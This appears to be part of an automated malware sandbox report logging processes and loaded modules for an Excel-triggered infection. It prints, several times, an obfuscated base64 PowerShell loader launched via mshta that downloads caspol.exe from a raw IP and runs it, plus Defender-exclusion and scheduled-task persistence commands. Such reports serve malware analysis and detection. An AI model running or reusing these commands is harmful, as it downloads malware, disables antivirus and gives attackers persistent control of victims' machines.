                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                    Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOymentJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"Jump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
